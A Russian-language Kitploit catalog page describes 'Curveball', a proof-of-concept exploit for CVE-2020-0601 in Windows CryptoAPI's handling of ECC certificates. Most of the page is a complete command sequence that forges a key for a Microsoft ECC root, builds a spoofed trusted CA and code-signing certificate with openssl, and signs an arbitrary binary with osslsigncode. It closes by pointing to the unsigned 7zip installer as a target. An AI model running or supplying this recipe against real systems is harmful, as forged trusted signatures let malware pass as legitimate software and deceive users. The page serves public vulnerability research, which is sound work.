Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Curveball — PoC для CVE-2020-0601 - эксплойт CryptoAPI | Kitploit
Инструменты/GitHubGitHub/ioncodes/curveball
Анализ уязвимостейАнализ КодаЭксплуатацияКриптографияТестирование на ПроникновениеЭксплуатация Бинарных Файлов
GitHubioncodes/curveball

Curveball

PoC для CVE-2020-0601 - эксплойт CryptoAPI

Репозиторий
2044 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Curveball

Доказательство концепции для CVE-2020-0601. Подробная статья в блоге доступна здесь. Эта эксплойт позволяет создать поддельный доверенный сертификат, используя уязвимость в обработке CryptoAPI определенных параметров сертификатов на основе ECC.

Установка

Клонируйте репозиторий и откройте его в Visual Studio 2019. Переключитесь на Release и скомпилируйте. Готовые бинарные файлы можно найти здесь.

Использование

root@kitploit:~
.\Curveball.exe MicrosoftECCProductRootCertificateAuthority.cer MicrosoftECCProductRootCertificateAuthority_fake.key
# in linux bash (you can also use Windows but you'd have to get an alternative for osslsigncode). WSL on Windows works fine.
openssl req -new -x509 -key MicrosoftECCProductRootCertificateAuthority_fake.key -out trusted_ca.crt
openssl ecparam -name secp384r1 -genkey -noout -out cert.key
openssl req -new -key cert.key -out cert.csr -config openssl.conf -reqexts v3_cs
openssl x509 -req -in cert.csr -CA trusted_ca.crt -CAkey MicrosoftECCProductRootCertificateAuthority_fake.key -CAcreateserial -out cert.crt -days 10000 -extfile openssl.conf -extensions v3_cs
openssl pkcs12 -export -in cert.crt -inkey cert.key -certfile trusted_ca.crt -name "Code Signing" -out cert.p12
./osslsigncode sign -pkcs12 cert.p12 -n "Signed by Layle" -in <BINARY_TO_SIGN> -out <SIGNED_BINARY>

Результат

Обратите внимание, что установщик 7zip обычно не подписан!

trusted

Скачать инструмент